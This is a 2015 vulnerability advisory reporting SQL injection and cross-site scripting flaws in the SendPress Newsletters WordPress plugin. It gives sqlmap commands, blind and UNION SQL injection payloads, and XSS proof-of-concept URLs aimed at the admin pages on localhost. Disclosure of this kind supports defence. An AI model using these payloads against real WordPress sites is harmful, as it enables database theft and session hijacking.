Subject: SQL injections and XSS in SendPress Newsletters 1.1.7.21
Date: Thu, 23 Jul 2015 18:03:38 +0200

Hello,

Plugin: SendPress Newsletters 1.1.7.21 https://wordpress.org/plugins/sendpress/

Authenticated administrators can execute arbitrary SQL commands and/or inject html/javascript (there is no CSRF protection).

1. SQL injection (emails_in_queue())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=sp-queue&listid=1[sqli]
Vulnerable parameter: listid

Example PHP callstack:
SendPress_Data::emails_in_queue   [/sendpress/classes/class-sendpress-data.php:166]
wpdb::get_var

Verification:
sqlmap --cookie "..." --dbms mysql -u "http://localhost/wp-admin/admin.php?page=sp-queue&listid=1" -p listid

...
Parameter: listid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=sp-queue&listid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OmFG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: page=sp-queue&listid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178626271,0x68575a4a56696a427479,0x7178717a71),NULL,NULL,NULL,NULL,NULL,NULL-- 
...


2. SQL injection (get_subscriber())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=[sqli]&listID=1
Vulnerable parameter: subscriberID

Example PHP callstack:
SendPress_Data::get_subscriber   [/sendpress/classes/class-sendpress-data.php:1078]
SendPress_Data::wpdbQuery   [/sendpress/classes/class-sendpress-data.php:51]
wpdb::get_row

Verification:

sqlmap --cookie "" --dbms mysql -u "http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=1&listID=1" -p subscriberID

...
Parameter: subscriberID (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=sp-subscribers&view=subscriber&subscriberID=1 AND (SELECT * FROM (SELECT(SLEEP(5)))LTHy)&listID=1

http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11&listId=1


3. XSS:

Method: GET
Url: http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=xss1&listID=xss2
Vulnerable parameters: listID, subscriberID

Verification:

http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=1&listID=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&listID=1